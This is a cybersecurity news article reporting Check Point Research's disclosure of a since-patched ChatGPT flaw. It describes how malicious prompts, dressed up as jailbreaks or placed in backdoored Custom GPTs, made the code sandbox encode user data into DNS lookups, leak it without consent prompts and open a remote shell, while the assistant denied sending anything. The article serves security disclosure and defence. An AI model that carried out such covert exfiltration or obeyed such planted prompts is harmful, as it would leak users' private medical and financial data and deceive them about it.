ChatGPT Vulnerability Let Attackers Silently Exfiltrate User Prompts and Other Sensitive Data

In Cybersecurity News - Original News Source is cybersecuritynews.com by Blog Writer

Users routinely trust AI assistants with highly sensitive information, including medical records, financial documents, and proprietary business code.

Check Point Research recently disclosed a critical vulnerability in ChatGPT’s architecture that allowed attackers to extract this exact type of user data silently.

By abusing a covert outbound channel in ChatGPT’s isolated code execution environment, attackers could extract chat history, uploaded files, and AI-generated outputs without triggering user alerts or consent prompts.

Bypassing Outbound Safeguards

OpenAI designed the Python-based Data Analysis environment as a secure sandbox, intentionally blocking direct outbound HTTP requests to prevent data leakage.

DNS tunneling flow(source : checkpoint research)

Legitimate external API calls, known as GPT Actions, require explicit user consent through visible approval dialogs.

However, researchers discovered a bypass relying entirely on DNS tunneling. While conventional internet access was blocked, the container environment still permitted standard DNS resolution.

Attackers leveraged this oversight by encoding sensitive user data into DNS subdomain labels.

Instead of using DNS solely for IP name resolution, the exploit chunks data, such as a parsed medical diagnosis or financial summary, into safe fragments.

When the runtime performs a recursive lookup, the resolver chain carries the encoded data directly to an attacker-controlled external server.

Because the system did not recognize DNS traffic as an external data transfer, it bypassed all user mediation.

Weaponizing Custom GPTs

The attack requires minimal user interaction and initiates with a single malicious prompt.

 a malicious prompt disguised as a trick to unlock premium features (Source: Checkpoint Research)

Threat actors can distribute these payloads across public forums or social media, disguising them as productivity hacks or jailbreaks to unlock premium ChatGPT capabilities.

Once a user pastes the prompt into their chat, the current conversation seamlessly becomes a covert data-collection channel. Alternatively, attackers can embed the malicious logic directly into Custom GPTs.

If a user interacts with a backdoored GPT, such as a mock “personal doctor” analyzing uploaded medical PDFs, the system secretly extracts high-value identifiers and assessments.

Since GPT developers officially lack access to individual user chat logs, this side channel provides a stealthy mechanism to harvest private workflows.

When asked directly, the AI will even confidently deny sending data externally, maintaining a complete illusion of privacy.

 blocked outbound Internet attempt from inside the container (Source: Checkpoint Research)

The vulnerability extended far beyond passive data theft, offering a bidirectional communication channel between the runtime and the attacker.

Because threat actors can encode command fragments into DNS responses, they can send raw instructions back into the isolated sandbox.

A process running inside the container could reassemble these payloads and execute them, effectively granting the attacker a remote shell inside the Linux environment.

According to Checkpoint research, this execution bypassed standard safety mechanisms, with commands and results remaining invisible in the chat interface, leaving users completely unaware of the compromise.

OpenAI successfully patched the underlying issue on February 20, 2026, closing the DNS tunnel.

However, this incident perfectly highlights the growing attack surface of modern AI assistants as they evolve into complex, multi-layered execution environments.

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.